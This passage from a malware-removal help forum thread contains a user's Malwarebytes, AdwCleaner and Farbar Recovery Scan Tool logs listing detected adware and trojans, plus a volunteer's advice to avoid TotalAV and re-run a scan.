    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\en\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\es\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\fr\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ru\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\2019.02.08_21.55.21.861811_installer_pid=8312.txt, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\Carrier.EXE, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\DevLib.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ExternalResource.XML, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\GenericSetup.exe, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\GenericSetup.exe.config, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\installer.exe, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\Microsoft.Win32.TaskScheduler.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\uTorrent.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\WizardPages.dll, Quarantined, [6100], [635578],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS\CAST.CONFIG, Quarantined, [3707], [404709],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe.config, Quarantined, [3707], [404709],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\uninstaller.exe.config, Quarantined, [3707], [404709],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\NAMFRESH.BIN, Quarantined, [0], [392686],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I\CAST.CONFIG, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\config.conf, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe.config, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\GMJSB.exe.config, Quarantined, [3707], [404875],1.0.9182
    Adware.Linkury.TskLnk, C:\USERS\THOMAZING!\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444923],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\CONFIG.XML, Quarantined, [3745], [404859],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\JOYBAM.EXE, Quarantined, [0], [392686],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q\CAST.CONFIG, Quarantined, [3707], [404610],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\uninstaller.exe.config, Quarantined, [3707], [404610],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\XUL9ZBX11.exe.config, Quarantined, [3707], [404610],1.0.9182
    Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444922],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\SILSONING.EXE, Quarantined, [0], [392686],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\hjuzju, Quarantined, [6000], [622124],1.0.9182
    Adware.Linkury, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\46C812328954B3C2.VIR\SET.EXE, Quarantined, [1174], [504848],1.0.9182
    Adware.ICLoader, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\423E52EEC1C7E6E2.VIR\LOCALNETSERVICE.EXE, Quarantined, [446], [629607],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6F63DA8166D7663.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\0B197384E1480C88.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\17B0D9AEADE97C1A.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\4D8D65C5DA32D3A5.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\5E15C71E020C778B.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\7349C58712B00B86.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\A7EC7F560E599347.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BC9E0698B166F917.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D41277DE13A9FABA.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\9869B8B38090EC66.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6D561D61D8312CF.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\002807D4DB6FEE2D.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\2DCB9015FB18C84D.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\638453067B9E1F8E.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\700D3EFE72E93B94.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\02FD59526C78F783.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\AEF671FBA34734D1.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\B3795D7D66BEAA7D.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\27C38BCBF4B005D9.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BCF319F66631ED11.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\8334C130D38839A4.VIR, Quarantined, [2891], [625750],1.0.9182
    Generic.Malware/Suspicious, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\34A244487189F73A.VIR, Quarantined, [0], [392686],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BD9C0D84EEB01CAF.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\E89B8E7F8458E128.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Agent, C:\WINDOWS\SYSTEM32\DRIVERS\WINMON.SYS, Quarantined, [99], [431629],1.0.9182
    Adware.Linkury, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HBDZI2BL.PRE\APSF360DEV.EXE, Quarantined, [1174], [475745],1.0.9182
    Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\IS-A6C3B.TMP\HOUSSEMID.EXE, Quarantined, [2891], [636075],1.0.9182
    Backdoor.Andromeda, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\INSTALLER_MI.EXE, Quarantined, [837], [116111],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\NCYVGT4VXOC.EXE, Quarantined, [2805], [474076],1.0.9182
    Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\XTEX.EXE, Quarantined, [528], [636874],1.0.9182
    Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\PUVOQBDY.0AB\APP.EXE, Quarantined, [528], [636874],1.0.9182
    PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
    PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [225], [550044],1.0.9182
    PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
    Adware.ICLoader, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\MCASIN.EXE, Quarantined, [446], [629607],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\KSKYZLLQ.5IO\SETUP.EXE, Quarantined, [0], [392686],1.0.9182

    Physical Sector: 0
    (No malicious items detected)

    WMI: 0
    (No malicious items detected)


    (end)

  6. #6
    Join Date
    Jul 2008
    Posts
    232
    AdwCleaner[C00]

    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-02-07.2 (Cloud)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Clean
    # -------------------------------
    # Start: 02-09-2019
    # Duration: 00:00:01
    # OS: Windows 10 Pro
    # Cleaned: 17
    # Failed: 0


    ***** [ Services ] *****

    No malicious services cleaned.

    ***** [ Folders ] *****

    Deleted C:\Users\Thomazing!\AppData\Roaming\TotalAV
    Deleted C:\Users\Thomazing!\Documents\TotalAV
    Deleted C:\Windows\Syswow64\SSL
    Deleted C:\Users\Thomazing!\AppData\Local\WhiteClick
    Deleted C:\Windows\rss

    ***** [ Files ] *****

    Deleted C:\Windows\System32\drivers\WinmonFS.sys

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    No malicious shortcuts cleaned.

    ***** [ Tasks ] *****

    No malicious tasks cleaned.

    ***** [ Registry ] *****

    Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
    Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
    Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
    Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
    Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
    Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
    Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
    Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
    Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
    Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
    Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries cleaned.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs cleaned.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries cleaned.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs cleaned.


    *************************

    [+] Delete Tracing Keys
    [+] Reset Winsock

    *************************

    AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########


    AdwCleaner[S00]


    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-02-07.2 (Cloud)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Scan
    # -------------------------------
    # Start: 02-09-2019
    # Duration: 00:00:14
    # OS: Windows 10 Pro
    # Scanned: 31844
    # Detected: 17


    ***** [ Services ] *****

    No malicious services found.

    ***** [ Folders ] *****

    PUP.Optional.Legacy C:\Users\Thomazing!\AppData\Roaming\TotalAV
    PUP.Optional.Legacy C:\Users\Thomazing!\Documents\TotalAV
    PUP.Optional.Legacy C:\Windows\Syswow64\SSL
    PUP.Optional.WhiteClick C:\Users\Thomazing!\AppData\Local\WhiteClick
    Trojan.Agent C:\Windows\rss

    ***** [ Files ] *****

    Trojan.Agent C:\Windows\System32\drivers\WinmonFS.sys

    ***** [ DLL ] *****

    No malicious DLLs found.

    ***** [ WMI ] *****

    No malicious WMI found.

    ***** [ Shortcuts ] *****

    No malicious shortcuts found.

    ***** [ Tasks ] *****

    No malicious tasks found.

    ***** [ Registry ] *****

    PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
    PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
    PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
    PUP.Optional.Glupteba HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
    PUP.Optional.PCProtect HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
    PUP.Optional.TotalAV HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
    PUP.Optional.TotalAV HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries found.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs found.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries found.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs found.



    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

  7. #7
    Join Date
    Jul 2008
    Posts
    232
    After doing AdwCleaner, this trojan was blocked by Malwarebytes. But it only pops up once in a while. [Attachment: Trojan after AdwCleaner.png]

  8. #8
    Join Date
    Jul 2008
    Posts
    232
    And why do the scanners treat Total AV as a PUP????

    Is that normal???

    I heard that Total AV is the number one free antivirus for 2019...

  9. #9
    Join Date
    Dec 2007
    Location
    Daly City, CA
    Posts
    22,377
    I'd avoid that program. Please read here: https://malwaretips.com/threads/tota...-a-scam.80362/

    Re-run the Farbar Recovery Scan Tool (FRST/FRST64) that you ran at the very beginning of this topic.


    • Double-click to run it.
    • Make sure you check the Addition.txt box.
    • Press the Scan button.
    • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.

  10. #10
    Join Date
    Jul 2008
    Posts
    232
    Oh, I see. What do you recommend aside from Avast? Something that has a very fast, simple and friendly interface? Is Kaspersky good by those criteria?


    Here:


    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 8.02.2019
    Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (10-02-2019 15:24:18)
    Running from C:\Users\Thomazing!\Downloads
    Loaded Profiles: Thomazing! & (Available Profiles: Thomazing!)
    Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
    Default browser: IE
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Microsoft Corporation) C:\Windows\System32\NetworkUXBroker.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
    HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    GroupPolicy: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{95ee421a-76b4-4efd-b402-599e79537eca}: [DhcpNameServer] 10.22.96.55 10.1.96.55

    Internet Explorer:
    ==================
    BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)

    FireFox:
    ========
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
